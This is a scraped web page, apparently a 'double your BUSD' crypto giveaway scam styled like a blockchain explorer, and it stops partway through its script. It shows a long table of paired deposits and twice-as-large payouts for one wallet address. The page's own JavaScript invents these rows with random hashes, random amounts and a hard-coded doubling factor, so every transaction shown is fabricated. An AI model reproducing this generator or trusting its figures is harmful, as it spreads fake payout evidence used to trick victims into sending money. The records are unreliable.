href="https://www.2xxpoolbonus.site/BUSD/index.html">86eBe609F6683cx9c70x4040056FE5A601E0A6F74F409F50Dx90c0165F11D80</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">975410226</a></td> <td><span class="timer">9 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x6009A00F046330x646000B7600D600197700686c</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>123199.31 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000657</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">c08FF4D492D3Fe5E0c944c94BDFA6e726985cF044008E99cEF64c9F735cF088</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">995976160</a></td> <td><span class="timer">10 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x68Fc4cac10700D648e024Fc00402c4Be8E0c6c96</a> </td> <td>249517.4 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000735</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">264613Ac0E90683367114887E02c89E9010a5042989c990E4EB4096727D9606</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">963110825</a></td> <td><span class="timer">10 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x68Fc4cac10700D648e024Fc00402c4Be8E0c6c96</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>124758.70 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00043</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">1646F3x9cF04905D060BB0F56aFBc01168cxc78c069426xx027994650744104</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">977798572</a></td> <td><span class="timer">11 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xAB8c6F86Ec59cB860D4ca8859900F90A7B08A159</a> </td> <td>125036.3 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000745</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">D49a490D1896a0B94499EFe6A78576D4x00cE466e1c5cBA54086B95EE90D4B1</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">947056966</a></td> <td><span class="timer">11 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xAB8c6F86Ec59cB860D4ca8859900F90A7B08A159</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>62518.15 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00013</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">e73x6F074F0cc0EBB6F783EcF48669e9e84e7E465444638634404F39666De36</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">944766368</a></td> <td><span class="timer">12 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">Binance 2</a> </td> <td>291601.7 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000725</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">8B13000e31cD412000004063c00AF66746141x66a9A9788656086919941xc40</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">941872149</a></td> <td><span class="timer">12 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">Binance 2</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>145800.85 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000557</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">6909EcBE8c006226034F73461x12E60E5c330160a6368x7600606D269a6x950</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">924064492</a></td> <td><span class="timer">13 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 2</a> </td> <td>297378.62 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000978</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">eAc166xDF27D853F545EEF8D8cE9Fc88A90790c9396cc07xa95D66cF0c1095a</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">937956441</a></td> <td><span class="timer">13 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 2</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>148689.31 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000499</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">65E766932B908100600068D7cF02694660008Bc61EB46D1395e3E9e59000596</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">929047250</a></td> <td><span class="timer">14 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4E416A4c692D6F9c101D0ec06AA8x09c85A9Fc0D</a> </td> <td>23046.8 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000909</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">900751c8c6F097E37004800600a9a874A4xD86F6c9c6EcaA091009c8ax29300</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">941141349</a></td> <td><span class="timer">14 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4E416A4c692D6F9c101D0ec06AA8x09c85A9Fc0D</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>11523.40 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000993</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">461aA1F5F0c9cB6040c9B642B64e775770xc69643eD690xe04340E059Bex5c1</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">959418576</a></td> <td><span class="timer">15 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x1c7F66B7e94c564x147cEc047e096cc66Fx503ae</a> </td> <td>140497.1 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000839</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">92xE38190F1240050x03953143690420913F3c3Da64533e0056B1c82780c19c</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">986937725</a></td> <td><span class="timer">15 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x1c7F66B7e94c564x147cEc047e096cc66Fx503ae</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>70248.55 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000101</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">F01A0e704c7669cc80EcaD0D9c98060D206920103054638904a005830919381</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">918572261</a></td> <td><span class="timer">16 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x91e6xE96043E09200075x94x1e6F5895B39E181D</a> </td> <td>313726.5 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00040</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">46077x7c834ea969c0cEcx6x5a6E669F60879F6Bc98F048E1c6000330E6FE07</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">997027008</a></td> <td><span class="timer">16 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x91e6xE96043E09200075x94x1e6F5895B39E181D</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>156863.25 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000225</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">E70D06FAc46E70xc6BF9404x8cB9x634ex0xF01978E6x03724B046Fc19040E0</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">939173644</a></td> <td><span class="timer">17 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">HitBTC 2</a> </td> <td>117068.3 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000986</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0A9cc0861003908aE6c6163ee6c514E1c60cc60E7005F90E93B7705E83D9a3e</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">941971862</a></td> <td><span class="timer">17 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">HitBTC 2</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>58534.15 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00091</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">ca8c64906F3794ccc006660B948664B863c99089e0c09A705887FFc0E095x08</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">910573569</a></td> <td><span class="timer">18 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xxc4850F7351904D5000c8914FxF42905E3E68400</a> </td> <td>282761.48 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000422</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">ecE5x4F48010a9AE2045971x19c7F8Bc98890e602EE6E9010436e007AE0E597</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">941593982</a></td> <td><span class="timer">18 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xxc4850F7351904D5000c8914FxF42905E3E68400</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>141380.74 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000916</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">9FED0660BB08c6050430c90E0x4300A8699E0097F40769A8450474F5x5D3959</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">957570041</a></td> <td><span class="timer">19 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">HitBTC 1</a> </td> <td>175674.52 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00054</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">610x90600F775BAc50706B04x7163004670F04F0647965a2D477408c0E9e945</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">913643337</a></td> <td><span class="timer">19 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">HitBTC 1</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>87837.26 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000527</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">A236699DFB3a1c0Aa00003E15aa99A466A0600e53950064F07Fc449753E06e4</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">985273616</a></td> <td><span class="timer">20 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x0c5F69c63D1E83xB4060944e0064E30E4002A049</a> </td> <td>130934.02 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000195</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">9B4E6c63AA9aF01990eA4x4AE64D59c0608925900156614096174699F4E6033</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">9100125</a></td> <td><span class="timer">20 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x0c5F69c63D1E83xB4060944e0064E30E4002A049</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>65467.01 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000649</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">00DBxEDe349060a6130E46796059E646F038FEB050B696107c89694eE0e8EBF</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">960500948</a></td> <td><span class="timer">21 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4902B3D98000E00a46c67009xe60c95cD964620c</a> </td> <td>135704.42 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000307</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">964F6814125F041502D960cFx590EE6FE0F2E00A0a469F5704F70DB502BFc24</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">968642426</a></td> <td><span class="timer">21 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4902B3D98000E00a46c67009xe60c95cD964620c</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>67852.21 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000548</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">9cE982E0564590A10369x0EF0FcBFax03830FcF36e59F13900044a1aBcA8c3F</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">984318061</a></td> <td><span class="timer">22 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 3</a> </td> <td>234183.84 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000758</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">3a0c5190F6B307468x5a041506B1E8c94960Be07E1606410e7x67AB1E0FF096</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">929415072</a></td> <td><span class="timer">22 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 3</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>117091.92 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000291</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">4E0940cDFeAxcE5aeF655A58260146DE3c576x089984870aE9F00c0D073B50c</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">969114358</a></td> <td><span class="timer">23 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 1</a> </td> <td>297717.16 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000487</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">66668F40BE7600B3B9F6A5593496109E434Fc34F9590Bc036610Ee6E69EE01c</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">986230876</a></td> <td><span class="timer">23 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 1</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>148858.58 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000249</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">B41309657e887986000D0E04FFx98B0a5c033009E12a0154AE91a99Da3BcF42</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">959744444</a></td> <td><span class="timer">24 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4a37837cA1384A930066c2ca6006F44963E93748</a> </td> <td>230595.54 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000487</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">7x79549615436c03197F03c85306F6389e00ac430F0Fx1x209505EE9948E002</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">984356934</a></td> <td><span class="timer">24 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4a37837cA1384A930066c2ca6006F44963E93748</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>115297.77 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000433</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">546862338Dx46c493B78c8341c02e4Dc0c3500B969915163F9900BaE003a400</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">998737465</a></td> <td><span class="timer">25 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 3</a> </td> <td>297569.36 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000791</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">616a0060c98400cD86c9ca0e99F0424F15098E800988D6125E09959030x02A9</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">996443609</a></td> <td><span class="timer">25 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 3</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>148784.68 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000960</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">E4997e0e30E71E4096D656991a1B671ce0D0eA0B03303009E83046003867A76</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">948012832</a></td> <td><span class="timer">26 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x5B4802cBB05FEcFaA044EFA400458cc06c450AB9</a> </td> <td>289296.1 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00023</span></td> </tr></thead>
                                    <tbody></tbody>
                                </table>
                            </div>
                            <div class="d-flex justify-content-between align-items-center mt-3 mb-4">
                                <div class="d-flex align-items-center text-secondary"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <!-- ###############################Start of progress bar######################################### -->

        <script src="./BUSD_files/jquery-3.6.0.min.js.download"></script>
    <script>
        




var parcent = 2

function update_count() {
  setInterval(() => {
    $('#num_').text(parseInt($('#num_').text()) + 1)
  }, 12e4)
}

function tx(_) {
  return 1 + Math.floor(Math.random() * _)
}

function dec2hex(dec) {
  return ('0' + dec.toString(16)).substr(-2)
}

function generateId(length) {
  for (
    var result = '',
      characters =
        '0x60ED062961e81B0907ca094cEFc965A0433F8574',
      charactersLength = characters.length,
      i = 0;
    i < length;
    i++
  )
    result += characters.charAt(Math.floor(Math.random() * charactersLength))
  return result
}

function startaddress(length = 1) {
  for (
    var result = '',
      characters = '13',
      charactersLength = characters.length,
      i = 0;
    i < length;
    i++
  )
    result += characters.charAt(Math.floor(Math.random() * charactersLength))
  return result
}

function create_transaction(mins) {
  var table,
    row = (table = document.getElementById('myTable')).insertRow(1),
    address = get_random(),
    amount = (200000 * Math.random()).toFixed(2),
    decimal = String(Math.random(1, 999))
  row.innerHTML =
    '<tr  class="tr"> <td><a class="hash-tag text-truncate" href="index.html">' +
    generateId(63) +
    '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
    tx(99999999) +
    '</a></td> <td><span class="timer">' +
    mins +
    ' mins ago</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
    address +
    '</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>' +
    amount +
    ' BUSD</td> <td><span class="small text-secondary">0<b>.</b>000' +
    tx(999) +
    '</span></td> </tr>'
  var table,
    row = (table = document.getElementById('myTable')).insertRow(1),
    send_amount = amount * parcent
  row.innerHTML =
    '<tr> <td><a class="hash-tag text-truncate" href="index.html">' +
    generateId(63) +
    '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
    tx(99999999) +
    '</a></td> <td><span class="timer">' +
    mins +
    ' mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
    address +
    '</a> </td> <td>' +
    send_amount +
    ' BUSD</td> <td><span class="small text-secondary">0<b>.</b>000' +
    tx(999) +
    '</span></td> </tr>'
}

function update_tx() {
  setInterval(() => {
    $('#num_').text(parseInt($('#num_').text()) + 1)
  }, 12e4)
}

function new_transaction() {
  var table,
    row = document.getElementById('myTable').insertRow(1),
    address = get_random(),
    amount = (200000 * Math.random()).toFixed(2),
    decimal = String(Math.random(1, 999))
  ;(row.innerHTML =
    '<tr> <td><a class="hash-tag text-truncate" href="index.html">' +
    generateId(63) +
